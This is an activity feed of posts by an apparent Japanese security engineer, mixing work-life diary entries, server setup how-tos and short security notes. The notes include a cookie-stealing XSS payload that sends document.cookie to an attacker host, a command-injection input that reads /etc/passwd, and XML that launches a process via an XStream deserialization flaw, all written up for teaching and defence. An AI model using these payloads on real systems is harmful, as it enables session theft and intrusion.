gamzatti

gamzatti

  • Posted カウントダウン to The Shatiku
    一大ミッションの幕開けまで、ついに10日を切った。 4月にこの仕事を始めた時は、まだまだと思っていたのに、時間が経つのは驚くほど早い。 早いと感じながらも、とても中身の詰まった濃い日々なので、一方ではとても長い様にも思える。 思い返せば、週休二日の週は、とても少なかったが、 私はマイペースにまったりと仕事ができる週末を気に入っている。 この週末出勤を終えた後の、お酒を楽しむひとときが最高。 むしろ、遊ぶよりも気分転換になっているのかもしれない。 食事において重要なのは「味、雰囲気、パートナー」だと恩師が教えてくださったが、 これは真実で、とても素敵な表現だと思う。 遊んだり趣味に勤しむのも楽しいが、これらは自己満足の域を超えるのは難しい。 仕事でも、時々自己満足に走りそうになることはあるが、 少しづつだが、相手方の立場に立てる様になってきた様に思う。 これが年を取りつつ、経験を積むということなのかもしれない。 私たちは技術者で、実体が見えにくい仕事だが、世のために役に立てていると実感できる瞬間がある。 例え些細なことでも、これから先もずっと、世のために何かできれば素敵だと思う。...
  • Posted S2-053 to Gamzatti's blog
    引き続きでたS2-053を検証。 またOGNL関連ですね。 FreeMarkerなるタグライブラリを使って、ユーザからの入力値を参照しているような場合に影響を受けるようです。 FreeMarkerは使ったことがなく、使い方がよくわかりませんでしたが、以下の通りにやると 確かに任意のコード実行できる。 S2-053 复现分析过程(附POC) とはいえ、攻撃成立には条件があるので、影響は限られているのかもしれないと思いました。...
  • Posted S2-052 to Gamzatti's blog
    仕事がひと段落したので、前から気になっていたS2-052を検証。 ProcessBuilderなどの外部プロセスを起動するコマンドが含まれるXMLをリクエストで投げると、 XStream.fromXML()でXMLをデシリアライズする処理の延長で任意のコードが実行されるようです。 私が試したのは以下。 S2-052的POC测试 ProcessBuilderのcommandメソッドの仕様は、引数が持つプログラムを実行したい場合、 ProcessBuilder pb = new ProcessBuilder(); pb.command("touch", "/tmp/attack") のようにcommandメソッドの引数に指定するので、 <command> <string>touch</string><string>/tmp/attack</string> </command> のように指定すると、好きな外部プロセスを起動できてしまう。 自サーバに入れているフィルタはOGNL系の文字列をブロックするようにしていますが、 今回はOGNL系の攻撃ではないので、これでは防げない。 リクエストにjava.lang.ProcessBuilderとかjava.lang.Runtimeなどが入っていたらブロックする、 なども検討した方がいいのかもしれないなと。 引き続き調査です。...
  • Posted With energy, anyone can do anything. to The Shatiku
    ずっと目標にしていた海外カンファレンスでの発表を無事終えた。 数ヶ月前に「このネタはなかなかいけそうだ」と話していた時は、ここまで実現できるとは思っていなかった。 周りの方々の助けがあったり、運が良かったことなどもあるが、 色んなタスクがある中で、短期間でよくここまで来れたと思う。 一番大きいのは、やはり相方がこつこつと検証し続けた成果の賜物だと思っている。 情熱を持ちつつ、地道に努力することは決して無駄にならず、とても大切なのだと再実感。 短い期間だったが、初の台湾も満喫できた。 時間が限られていたこと、大きなミッションを抱えていたこと、そしてそれがうまくいったこと、 が、さらにこの旅を濃縮された、充実したものにしてくれたように思う。 私たちのお気に入りの瞬間。...
  • Posted VIPルームと日本酒。 to The Shatiku
    夏休み3日目のワーキングディ。 休みにも関わらず、朝9時頃から活動開始。 早くから活動開始したお陰で、盛りだくさんだった今日の目標タスクも無事完了! 今日のメインの活動場所はカラオケ。 ノマドするカフェ巡りに困ることがあるけれど、昼間のカラオケのフリータイムはなかなか良い選択肢かもしれない。 カフェを巡るより安い、静か、人目を気にせずプレゼンの練習もできる、 さらに、気分転換に歌って踊れるw しかも今日は幸運なことに、VIPルームなるパーティルームが偶然空いていて、5時間くらい 広々とした部屋とふかふかのソファーを堪能できるという。 その後はさっと残りのタスクを終わらせ、アジアンビストロと日本酒が美味しいお店でアフターを楽しむ。 全職場の先輩にプレゼントした懐かしの日本酒があって、美味しい海鮮料理と共に、久しぶりに日本酒を味わう。 休日出勤をこんなに楽しめるなんて、幸せなことだ。...
  • Posted 仕事と共に、お酒を楽しむ to The Shatiku
    夏休み2日目のワーキングディ。 今日はひたすらプレゼンの英語スクリプトを書く。 あまり何も考えずに書いたけれど、ざっと読み合わせをしたら、 結構ばっちりな時間配分とボリューム。 後はひたすら練習あるのみ。 夜は、お洒落カフェでスクリプトとプレゼンと一緒に公開するコードの クロスチェックをしながら、お酒とおつまみを嗜む。 こういうシチュエーションが楽しめるのも私たちの良いところ。 その後はカラオケでスクリプトの読み合わせの練習をして、 余った時間はまたひたすら歌って踊るw 公私混同や仕事とプライベートは明確に区別すべき、 という意見もあるけれど、私は、休日でも好きな時に働いて、 疲れたら気ままに休み、遊ぶのも仲々良いと思う。 お酒の場では、他愛のない話や恋愛話、噂話などをするのも良いが、 こんな飲み方も仲々素敵だと私は思う。...
  • Posted 気分転換は歌って踊れ。 to The Shatiku
    カレンダーでは今日から夏休み。 でも、私達にはタスクが山積みなので、活動活動。 今日は海外カンファレンスのプレゼン資料のサブミット期限。 ギリギリになったものの、なかなか良い資料になったと思う。 協力いただいた皆様には、本当に感謝しています。 直前になって、検証ツールのバグを発見。 危なかった。。。でも、見つけられて良かった。 他人に公開するプログラムを書くのは3年ぶりくらいか。 商用製品程ではないにしても、やっぱり責任感が違う。 久しぶりにコード解析ツールでもかけてみようかな。 サブミット後は、講演の練習のためにカラオケに行くも、 開放的な気分になったからか、歌って踊って終了(笑) 気分転換も必要だ。だって夏休みだもの。 その後は、軽いシンガポール料理とお酒を嗜んで、夏休み第一日目のshatiku活動終了。 明日からまた頑張ろう。...
  • Posted 追い込まれているからこそ、楽しい to The Shatiku
    今日、改めて8、9月のスケジュールを再確認。 スケジュールのストイックさにはかなり前から認識してはいたけれど、可視化するといよいよリアルにw 可視化って重要だ。 チーム全員がのこのやばさを再認識したので、これからは一丸となって、 コストは最小限に、良いものを作る方向に向かっていけるだろう。 そう言えば、昨年も10月に一大ミッションがあって、一年前のこの時期も ストイックに活動していた気が。 でも、楽しかった記憶しかない(肉体は多少しんどかったけれど) 一年後も同じように振り返れていることを祈って。...
  • Posted 海外カンファレンスの夢 to The Shatiku
    地道な努力が実り、初の海外カンファレンスにパスした。海外カンファレンスでの発表は、夢であり目標でもあったので、相方共々アドレナリン全開中。 というわけで、先週末のshatiku 活動は、田園都市線沿いのカフェでカンファレンスの準備。 休みの日も仕事?と思うかもしれないが、私はこれを辛いと思ったことはない。むしろお洒落なカフェでくつろぎながら、マイペースに仕事ができるので私はこの時間がとても気に入っている。 大変なのが、ノマドワーキングに適したお店を探すこと。休日の繁華街や駅前はどこも混んでいる。お店選びを間違えると、作業の効率が落ちてしまう。 人が多い駅でも、住宅街の裏通りや、ビジネル街の方面は意外と空いている。穴場のお気に入りスポットを見つけておくのがポイント。 私達は恵まれたことに、業務端末が電源持ちが良いMACで、さらに通信無制限のモバイルwifiルータを会社から支給されているので、電源とwifiの環境はあまり意識したことがない。 最近のお気に入りは、スターバックスのneighborhood and coffee。ノマドをするようになって知ったが、地元密着型のスタバらしく、通常のスタバにはないメニューがあったり、内装がお洒落だったりする。あまり知られていないのか、意外と空いている。 ノマドワーキングをした日は、仕事を片付けてからのひと時の飲みが恒例。目標を達成した後のお酒は最高。 よく働き、よく遊ぶ、が人生を豊かにするポイントだと私は思っている。...
  • Posted よく働き、よく遊べ。 to The Shatiku
    "Shatiku"というとどのようなイメージを持つだろうか? とある辞書サイトによると、"仕事に非常な情熱を傾ける人のこと" らしい。 私は決してネガティブな意味でこの言葉を使っているのではなく、 仕事の楽しさ、素晴らしさを表現するために、このブログを立ち上げた。 私は今社会人13年目。 仕事にも仲間にも恵まれ、忙しいながらとても充実した毎日を送っている。 これは、私たちの汗と涙と感動(?)の活動記録と、社会で戦う皆さまへのメッセージ。...
  • Posted httpdのログをsyslogサーバに転送して、ファイルを分けて保存する to Know-how sharing
    httpdのログをsyslogサーバに転送して、ファイルを分けて保存する - 送信元ホストの設定 /etc/httpd/conf/httpd.confに以下を追記 <IfModule log_config_module> CustomLog "|/usr/bin/logger -p local5.info -t httpd_access" combined /etc/rsyslog.conf に以下を追記 local5.* @@reverse-edge.com:514 - syslogサーバの設定 /etc/rsyslog.conf コメント解除 $ModLoad imtcp $InputTCPServerRun 514 以下を追記 $template httpd,"/var/log/syslog/%hostname%/httpd/%programname%.log" local5.* -?httpd - 上記設定をすると、送信元ホストごとに /var/log/syslog/{hostname}/httpd というディレクトリにhttpdのログがフォワードされるようになる 参考) https://www.server-world.info/query?os=CentOS_6&p=rsyslog https://genchan.net/it/server/4127/ https://orebibou.com/2017/03/apache%E3%81%AE%E3%83%AD%E3%82%B0%E3%82%92rsyslog%E3%81%A7%E8%BB%A2%E9%80%81%E3%81%99%E3%82%8B/...
  • Posted Business trip in Paris -part1- to Gamzatti's blog
    7月末にパリ出張へ。 9年前に出張でオランダのHilversumに行って以来、人生二回目のヨーロッパ。 ヨーロッパが二回とも出張って、IT 系にしては珍しいので幸運だと思う。 今回のミッションは日本で開催していないセキュリティ系のトレーニングを受講することだったので、スケジュール的にも余裕があり、色々楽しめた。 1日目は12時間半のフライトを経て、現地時刻16時半にシャルル・ド・ゴール空港に到着。 "RER"(rarではない:-)) と呼ばれる高速郊外鉄道でパリ市内へ。 海外へ行くと、大抵最初に迷うのが電車の乗り方。 パリはメトロがたくさん走っていて、今回も路線や切符の買い方に少し迷う。 Denfert-Rochereauという駅で降りてホテルへ。 RERは郊外電車らしく、一駅の間隔が長いので、ホテルに着いた頃には結構良い時間になっていた。 移動疲れもあるので、初日の夜はホテルのラウンジで夕食を済ませることに。 このラウンジがとても良かった。静かで落ち着いていて、料理も美味。 何より驚いたのが、夏のパリは日没が遅く、22時頃まで明るいこと。 夕食後は部屋から美しい夕日が見えた。 パリ旅の幕開けは、こんな感じでスタート。...
  • Commented on Install MySQL on CentOS 7 using yum
    CentOS7 に MySQL をRPMでインストールする cd /var/tmp wget http://dev.mysql.com/get/Downloads/MySQL-5.6/MySQL-5.6.36-1.el7.x86_64.rpm-bundle.tar tar xvf MySQL-5.6.36-1.el7.x86_64.rpm-bundle.tar rpm -Uvh MySQL-server-5.6.36-1.el7.x86_64.rpm ※インストール中以下のメッセージが表示される A RANDOM PASSWORD HAS BEEN SET FOR THE MySQL root USER ! You will find that password in '/root/.mysql_secret'. rpm -Uvh MySQL-client-5.6.36-1.el7.x86_64.rpm ※クライアントを入れないと、mysqlコマンドが使えない mysql --version...
  • Posted Install MySQL to CentOS7 using RPM to Know-how sharing
    CentOS7 に MySQL をRPMでインストールする # cd /var/tmp# wget http://dev.mysql.com/get/Downloads/MySQL-5.6/MySQL-5.6.36-1.el7.x86_64.rpm-bundle.tar# tar xvf MySQL-5.6.36-1.el7.x86_64.rpm-bundle.tar # rpm -Uvh MySQL-server-5.6.36-1.el7.x86_64.rpm ※インストール中以下のメッセージが表示されるA RANDOM PASSWORD HAS BEEN SET FOR THE MySQL root USER !You will find that password in '/root/.mysql_secret'. # rpm -Uvh MySQL-client-5.6.36-1.el7.x86_64.rpm※mysqlコマンドを使うために必要 # rpm...
  • Posted s2-048 to Gamzatti's blog
    s2-048の脆弱性、 自分のサーバがやばいかなと思ってPoCを実行してみたら、 s2-045 の時に作ったサーブレットフィルタがブロックしてくれていました。 あまり脆弱性の詳細をちゃんと調べていないけれど、s2-048もペイロードを見たらやっぱりOGNL関連だからかな。 リクエストに含まれるOGNLコードをサーブレットフィルタやWAFでブロックするのは、回避策としてなかなか効果がありそうです。...
  • Commented on Install MySQL on CentOS 7 using yum
    In MySQL 5.7, initial setup method has been changed. Check root initial password. # cat /var/log/mysqld.log | grep 'temporary password‘ 2017-06-18T13:39:33.902255Z 1 [Note] A temporary password is generated for root@localhost: hNY5yEv&%f2- Change Password using mysql_secure_installation # mysql_secure_installation...
  • Commented on Implementation of SSL
    Before update certificate, need to stop httpd. service httpd24-httpd stop...
  • Commented on Installation of php from source (CentOS7)
    yumでphp,httpdをインストールした場合は、インストール後httpdの再起動のみでapache上でphpが実行できるはず。 # yum info php ・・・中略・・・ 名前 : php バージョン : 5.4.16 # yum install php # rpm -qa | grep php php-cli-5.4.16-42.el7.x86_64 php-5.4.16-42.el7.x86_64 php-common-5.4.16-42.el7.x86_64 # php -v PHP 5.4.16 (cli) (built: Nov 6 2016 00:29:02) systemctl restart httpd...
  • Posted Technical repot of WannaCry to Gamzatti's blog
    今話題騒然のランサムウエアをチームみんなで分析しました。 http://sisoc-tokyo.iii.u-tokyo.ac.jp/wp-content/uploads/2017/05/20170518_WannaCry_report.pdf...
  • Posted How to Install Elasticsearch+logstash+kibana on CentOS to Know-how sharing
    How to Install Elasticsearch+logstash+kibana on CentOS - Install Elasticsearch by following. https://www.elastic.co/guide/en/elasticsearch/reference/5.3/rpm.html - Configure Elasticsearch https://www.elastic.co/guide/en/elasticsearch/reference/5.3/settings.html /etc/elasticsearch/elasticsearch.yml network.host: 153.126.171.84 - Start Elasticsearch /etc/rc.d/init.d/elasticsearch start $ curl localhost:9200 { "name" : "yPjLETS", "cluster_name" : "elasticsearch", "cluster_uuid" : "fFp2Z0L8RxyKa7f26TEPng", "version" :...
  • Posted Vulnerable sample code -XSS- to Know-how sharing
    XSS XSS - 要素の内容にスクリプトを注入 -サンプルコード1 <?php $username = $_GET["username"]; session_start(); print " ".$username; ?> -攻撃コード - ダイアログを表示 usernameに以下を入力 <script>alert(document.cookie)</script> http://hogehoge.com/xss.php?username=%3Cscript%3Ealert(document.cookie)%3C/script%3E - cookieを攻撃者のサーバに送信 http://hogehoge.com/xss.phpusername=<script>window.location= 'http://attacker.malicious.com/attack.php?'+document.cookie;</script> 実際にはURLエンコードが必要 攻撃者サーバのアクセスログ GET /attack.php?PHPSESSID=486kotqq25ij9t3tj0nq0ebp25 HTTP/1.1" 200 94 "http://hogehoge.com/xss.php?username=%22%3E%3Cscript%3Ewindow.location%3D%27http%3A%2F%2Fattacker.malicious.com%2Fattack.php%3F%27%2Bdocument.cookie%3B%3C%2Fscript%3E%3C!--" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0)...
  • Posted Vulnerable sample code -OS command injection- to Know-how sharing
    OS コマンドインジェクション - 脆弱なコードの例 <html> <body> <form name="mailForm" action="mail.php" method="POST"> メールアドレス: <input type="text" name="email" size="40"><br> <input type="submit" value="send"> </form> </body> </html> <?php $email=$_POST['email']; system("echo 'hello' | sendmail ".$email); print "メールアドレス:".$email; ?> - 入力 user1@example.com;cat /etc/passwd - 対策 - エスケープする...
  • Posted How to use stored procedure in PHP to Know-how sharing
    How to use stored procedure in PHP - Create procedure delimiter // CREATE PROCEDURE selectOrders(IN user varchar(255), IN keyword varchar(255)) BEGIN SELECT * from orders where username=user and ordername =keyword; END; - Check procedure show procedure status; +----------+--------------+-----------+----------------+---------------------+---------------------+---------------+---------+----------------------+----------------------+--------------------+ |...
  • Posted How to implements webshell using JSP to Know-how sharing
    Look at the source code here....
  • Posted Take risks to prism
    --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- We talked about what one's life depend on while drinking.Which would more strongly affect them, fortune or environment? I think there are something which...
  • Posted Filter Incoming Serialization Data to Gamzatti's blog
    JEP 290: Filter Incoming Serialization Data Java9から、 ObjectInputFilter という新しいAPIを使って、セキュアにデシリアライズを行う仕組みが提供されるそうです。 - ちらっと読んだ感じでは、デシリアライズ対象オブジェクトが参照するオブジェクトの数や、 深さ(ネスト)を制限する仕組みっぽい -ObjectInputStream#resolveClass()のように、デシリアライズするクラスを制限することも出来るっぽいが、 "Non-Goals"に特定のクラスに対するポリシーを制限するものではないというような記載もあり、 コンセプトが不明。 - システムプロパティとプログラム個別、どちらでも設定出来る - これらの機能はJava8以前のバージョンにもバックポートされる予定とのこと。 →現段階では最新のJava8にもバックポートされていないようです。 時間が出来たら試してみよう。 なお、Java9は今年の7月にリリースされるようです。...
  • Posted The way to prism
    --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- --------------------------------------------- Years have passed so quickly since we met first time.I remember the first day we met. In my first impression, you seemd like smart and...
  • Posted How to collect logs using Splunk to Know-how sharing
    - インストール http://ricemalt.blog98.fc2.com/blog-entry-2.html に従ってインストール - 環境変数設定 export SPLUNK_HOME=/opt/splunk PATH=$PATH:$SPLUNK_HOME/bin - 自動起動設定 splunk enable boot-start - 起動 splunk start / stop / restart ※非root ユーザでの Splunk の起動設定は実施せず - 通信許可 iptables で8000(TCP),8089(TCP),443(UDP/syslog),9997(forwarder)を許可 - WebUI http://{hostname}:8000/ - ユーザ作成 admin(元々存在する) - ログ収集設定 -...
  • Commented on Processes of suffering or struggling for something are never be vain even if they make no outputs.
    I've just finished two years of my secondment period. In the beginning , I'd been suffering or struggling everyday since both works and environment changed completely compared with my past. I might have felt more pressure than I recognized. I...
  • Posted Processes of suffering or struggling for something are never be vain even if they make no outputs. to Gamzatti's blog
    2年間の出向先での任期が終わった。 仕事内容も環境も大きく変わったので、最初は悩み、格闘する毎日。 これまでも割と頻繁に仕事が変わっていたので、変化には慣れていたはずだったけど、 自分で感じている以上に、プレッシャーを感じていたのだと思う。 挫折しかけた時もあったけど、ここで逃げたら11年のキャリアが終わってしまうと思った。 時間がかかっても地道にやるしかないと思って、先が見えないながら模索しつつ少しづつ進んでいくうちに、 いつの間にか自然に頭と手が動くようになって、仕事が楽しい、活躍できていると感じるようになった。 周りの人と打ち解けてから本音で話してみると、みんな私と同じように悩んだり焦っていたことも分かって、 少し安心すると同時に、一見余裕に見える人でも、みんな裏では悩みながら必死で頑張っているのだなぁと。 「成果が出なくても、悩んだり失敗したりした過程は決して無駄にはならない」 一緒に頑張ってきた仲間が教えてくれた言葉がとても印象的で、それは真実だと思った。...
Subscribe to feed Recent Actions from gamzatti

Following

Not following anyone

About This Page

Find recent content on the main index or look in the archives to find all content.

Categories

Pages